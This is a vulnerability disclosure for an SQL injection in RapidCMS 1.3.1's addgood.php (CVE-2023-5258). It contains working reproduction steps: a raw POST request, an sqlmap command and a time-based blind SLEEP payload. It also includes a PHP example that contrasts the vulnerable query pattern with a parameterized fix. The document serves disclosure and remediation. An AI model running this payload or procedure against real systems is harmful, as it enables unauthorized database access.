CVE-2023-5258: SQL injection vulnerability exists in RapidCMS Dev.1.3.1 · Issue #4 · yhy217/rapidcms-vul

A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240867.


[Suggested description]
RapidCMS Dev.1.3.1 was discovered to contain an SQL injection vulnerability in /resource/addgood.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product Code Base]
RapidCMS Dev.1.3.1
[Affected Component]
File: /resource/addgood.php
Parameter: id
[Attack Type]
Remote
[Vulnerability demonstration]
1. Using HackBar, send a POST request to http://localhost:8095/resource/addgood.php with the post data id=1* and click the execute button.

2. Use Burp Suite to capture the request and save it as 175.txt in the sqlmap directory.

The data in 175.txt:
POST /resource/addgood.php HTTP/1.1
Host: localhost:8096
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://localhost:8096
Connection: close
Referer: http://localhost:8096/resource/addgood.php
Cookie: PHPSESSID=su3eg6251ks1n2i43n36fqbn46; admin=Y6W6Rbt6a5W546O0O0O7; user=e4W4h250M9DaA6xa; name=yhy001
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache

id=1*

3. Run the command python sqlmap.py -r 175.txt --risk=3 --level=5 --current-db

After the probe completes, sqlmap reports an SQL injection in the id parameter and obtains the current database name:

sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 1415 FROM (SELECT(SLEEP(5)))IZIr)-- VZWO

[Cause of vulnerability]
In /resource/addgood.php, the value of id is user-controlled and the application does not validate the input before using it. An attacker can use a double quotation mark to break out of the SQL literal and splice additional SQL into the statement, causing SQL injection.
[Repair suggestions]
Verify the legitimacy of user input.
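The following is an added illustration, not code from RapidCMS: it reconstructs the vulnerable pattern the report describes (the id value interpolated into a double-quoted SQL literal) and places a hardened version beside it. The table name goods, the column names, and the exact shape of the original query are assumptions; the demo uses an in-memory SQLite database so it runs without a MySQL server, and the rejected input is the payload shown in the sqlmap output above.

```php
<?php
declare(strict_types=1);

// Vulnerable shape (assumed, reconstructed from the report): the request value is
// concatenated straight into the query text inside a double-quoted literal, so a
// value containing a double quote ends the literal and the remainder is parsed as
// SQL. This function is shown for contrast only and is never called below.
function addgood_vulnerable(PDO $db, string $id): array
{
    $sql = "SELECT * FROM goods WHERE id=\"$id\"";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: validate the shape of the input first (an id is a positive
// integer), then bind it as a parameter so the database receives the value
// separately from the statement text and it can never change the query's structure.
function addgood_hardened(PDO $db, string $id): array
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $id)) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT * FROM goods WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed fixture: an in-memory SQLite table standing in for the real schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO goods (id, name) VALUES (1, 'apple'), (2, 'pear')");

// A well-formed id passes validation and is looked up through the bound parameter.
$rows = addgood_hardened($db, '1');
printf("hardened: %d row(s) for id=1\n", count($rows));

// The time-based blind payload from the sqlmap output above (used here only as
// an input string) fails validation before any SQL is built, so the database
// never sees it.
$payload = '1" AND (SELECT 1415 FROM (SELECT(SLEEP(5)))IZIr)-- VZWO';
try {
    addgood_hardened($db, $payload);
} catch (InvalidArgumentException $e) {
    printf("hardened: rejected payload (%s)\n", $e->getMessage());
}
```

The two defences are deliberately layered: the allow-list check rejects anything that is not an integer id and gives a clean error to log and alert on, while the prepared statement is the control that actually removes the injection, so it still protects the query even if the validation regex is later loosened.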
